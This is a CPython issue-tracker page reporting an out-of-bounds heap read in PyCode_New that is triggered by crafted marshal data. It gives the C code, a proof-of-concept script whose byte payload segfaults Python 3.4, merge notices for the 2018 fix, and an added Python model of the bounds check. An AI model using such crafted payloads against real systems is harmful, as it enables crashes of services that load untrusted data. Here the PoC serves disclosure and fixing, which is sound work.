
This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in Python's Developer Guide.
Created on 2015-07-12 17:46 by blarsen, last changed 2022-04-11 14:58 by admin. This issue is now closed.
| Files | | |
|---|---|---|
| File name | Uploaded | Description |
| invalid_read.py | blarsen, 2015-07-12 17:46 | POC as Python 3.4 script |
| Pull Requests | | |
|---|---|---|
| URL | Status | Linked |
| PR 8283 | merged | serhiy.storchaka, 2018-07-14 11:05 |
| PR 8291 | merged | miss-islington, 2018-07-16 06:11 |
| PR 8311 | merged | serhiy.storchaka, 2018-07-17 06:42 |
| Messages (4) | | |
|---|---|---|
| msg246658 | Author: Brad Larsen (blarsen) | Date: 2015-07-12 17:46 |

`PyCode_New` can read invalid heap memory.

File `Objects/codeobject.c`:

```c
PyCodeObject *
PyCode_New(int argcount, int kwonlyargcount,
           int nlocals, int stacksize, int flags,
           PyObject *code, PyObject *consts, PyObject *names,
           PyObject *varnames, PyObject *freevars, PyObject *cellvars,
           PyObject *filename, PyObject *name, int firstlineno,
           PyObject *lnotab)
{
    PyCodeObject *co;
    unsigned char *cell2arg = NULL;
    Py_ssize_t i, n_cellvars;
    // ...
    n_cellvars = PyTuple_GET_SIZE(cellvars);
    // ...
    /* Create mapping between cells and arguments if needed. */
    if (n_cellvars) {
        Py_ssize_t total_args = argcount + kwonlyargcount +
            ((flags & CO_VARARGS) != 0) + ((flags & CO_VARKEYWORDS) != 0);  // *** 1 ***
        // ...
        /* Find cells which are also arguments. */
        for (i = 0; i < n_cellvars; i++) {
            Py_ssize_t j;
            PyObject *cell = PyTuple_GET_ITEM(cellvars, i);
            for (j = 0; j < total_args; j++) {
                PyObject *arg = PyTuple_GET_ITEM(varnames, j);  // *** 2 ***
                if (!PyUnicode_Compare(cell, arg)) {            // *** 3 ***
                    cell2arg[i] = j;
                    used_cell2arg = 1;
                    break;
                }
            }
        }
        // ...
    }
    // ...
}
```

1. `total_args` is determined from parameters that are user-controlled (see `r_object` in `Python/marshal.c`, in the `TYPE_CODE` case, lines 1265--1277).
2. The `varnames` tuple is indexed with a value in the range [0, total_args), which could be larger than the range of valid indexes for `varnames`.
3. `arg` is now a bogus PyObject value, and causes a segfault in `PyUnicode_Compare`.

Environment:

```
$ python3.4 --version
Python 3.4.2
$ uname -a
Linux debian-8-amd64 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) x86_64 GNU/Linux
```

POC:

```python
from marshal import load
from io import BytesIO

# Crafted marshal stream; loading it builds the code object through
# PyCode_New (r_object, TYPE_CODE case in Python/marshal.c).
payload = b'\xe3\x01\x00\xff\x00\x00\x00\x00\xfc\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\n\x00\x00\x00k\x00\x00|\x00\x00\x83\x01\x00S)\x01N)\x01\xda\x03foo)\x01\xda\x01x\xa9\x01\xda|x\xa9x\xa9\x00\xe3\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\n\x00\x00\x00t\x00\x00|\x00\x00\x83\x01\x00S)\x01N)\x01\xda\x03foo)\x01\xda\x01x\xa9\x00r\x03\x00\x00\x00\xfa\x0fmk_tesTgases.py\xda\x08<lambda>\x01\x00\x00\x00s\x00\x00\x00\x00r\x03\x00\x00\x00\xfa\x0fmk_testck_te\x00)\x01\xda\x01x\xa9x\xa9\x00\xe3\x01\x00\x00\x00\x00\x00\x80\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\n\x00\x00\x00t\x00\x00"\x00\x00\x83\x01\x00S)\x01N)\x01\xda\x03foo)\x01\xda\x01x\xa9\x00r\x03\x00\x00\x00\xfa\x0fmk_tMstgases\x11py\xda\x08<lambda>$\x00\x00\x12s\x00\x00\x00\x00r\x03\x00'
load(BytesIO(payload))
```
| msg321710 | Author: Serhiy Storchaka (serhiy.storchaka) | Date: 2018-07-16 06:10 |
|---|---|---|

New changeset bd47384e07bde38a8f18b90b4cea02a505d95c75 by Serhiy Storchaka in branch 'master':
bpo-24618: Add a check in the code constructor. (GH-8283)
https://github.com/python/cpython/commit/bd47384e07bde38a8f18b90b4cea02a505d95c75
| msg321713 | Author: miss-islington (miss-islington) | Date: 2018-07-16 07:09 |
|---|---|---|

New changeset 5594f1dfbe214151b75405be042e9420a3649241 by Miss Islington (bot) in branch '3.7':
bpo-24618: Add a check in the code constructor. (GH-8283)
https://github.com/python/cpython/commit/5594f1dfbe214151b75405be042e9420a3649241
| msg321802 | Author: Serhiy Storchaka (serhiy.storchaka) | Date: 2018-07-17 07:33 |
|---|---|---|

New changeset cf30d5c5b88276a9af863438839ba386b9723a14 by Serhiy Storchaka in branch '3.6':
bpo-24618: Add a check in the code constructor. (GH-8283) (GH-8311)
https://github.com/python/cpython/commit/cf30d5c5b88276a9af863438839ba386b9723a14
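An added example, not code from the issue or from CPython, that models in Python the kind of bounds check the linked commits add ("a check in the code constructor": refuse a code object whose argument counts exceed `len(co_varnames)`, forming the sum only when it cannot overflow), and asks the running interpreter whether it now rejects such an object; it assumes CPython 3.8 or later for `code.replace()` and uses a constructed sample function.

```python
"""Model of the varnames bounds check behind bpo-24618 (added example).

The authoritative C code is in the linked commits; this mirrors its shape
in Python and checks that the running CPython (assumed 3.8+) refuses a
code object whose argument count is larger than len(co_varnames)."""
import inspect

CO_VARARGS = inspect.CO_VARARGS          # 0x04
CO_VARKEYWORDS = inspect.CO_VARKEYWORDS  # 0x08


def varnames_too_small(argcount, kwonlyargcount, flags, n_varnames):
    """True when PyCode_New's cell/argument loop would read varnames[j]
    for some j >= n_varnames (the out-of-bounds read in the report).

    The sum is only formed once each count is already bounded by
    n_varnames, so values taken from an untrusted marshal stream cannot
    overflow the addition in the C version of this check."""
    if argcount < 0 or kwonlyargcount < 0 or n_varnames < 0:
        return True
    if argcount <= n_varnames and kwonlyargcount <= n_varnames:
        total_args = (argcount + kwonlyargcount
                      + bool(flags & CO_VARARGS) + bool(flags & CO_VARKEYWORDS))
    else:
        total_args = n_varnames + 1   # already known to be too large
    return total_args > n_varnames


def code_is_consistent(code):
    """Apply the same check to a real code object's own counts."""
    return not varnames_too_small(code.co_argcount, code.co_kwonlyargcount,
                                  code.co_flags, len(code.co_varnames))


def interpreter_rejects_oversized_argcount(code):
    """True if this CPython refuses (ValueError) to build a code object
    with co_argcount > len(co_varnames), as the patched constructor does."""
    try:
        code.replace(co_argcount=len(code.co_varnames) + 1)
    except ValueError:
        return True
    return False


def sample(x, *rest, key=None, **kw):   # constructed sample function
    return x, rest, key, kw


if __name__ == "__main__":
    c = sample.__code__
    print("consistent:", code_is_consistent(c))
    print("rejected by interpreter:", interpreter_rejects_oversized_argcount(c))
```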
| History | | | |
|---|---|---|---|
| Date | User | Action | Args |
| 2022-04-11 14:58:18 | admin | set | github: 68806 |
| 2018-07-17 07:49:27 | serhiy.storchaka | set | status: open -> closed; stage: patch review -> resolved; resolution: fixed; versions: + Python 3.6, Python 3.7, Python 3.8, - Python 3.4 |
| 2018-07-17 07:33:57 | serhiy.storchaka | set | messages: +msg321802 |
| 2018-07-17 06:42:45 | serhiy.storchaka | set | pull_requests: +pull_request7846 |
| 2018-07-16 07:09:47 | miss-islington | set | nosy: +miss-islington; messages: +msg321713 |
| 2018-07-16 06:11:54 | miss-islington | set | pull_requests: +pull_request7825 |
| 2018-07-16 06:10:23 | serhiy.storchaka | set | messages: +msg321710 |
| 2018-07-14 11:05:22 | serhiy.storchaka | set | keywords: +patch; stage: patch review; pull_requests: +pull_request7817 |
| 2015-07-12 18:17:08 | serhiy.storchaka | set | nosy: +serhiy.storchaka |
| 2015-07-12 17:46:46 | blarsen | create | |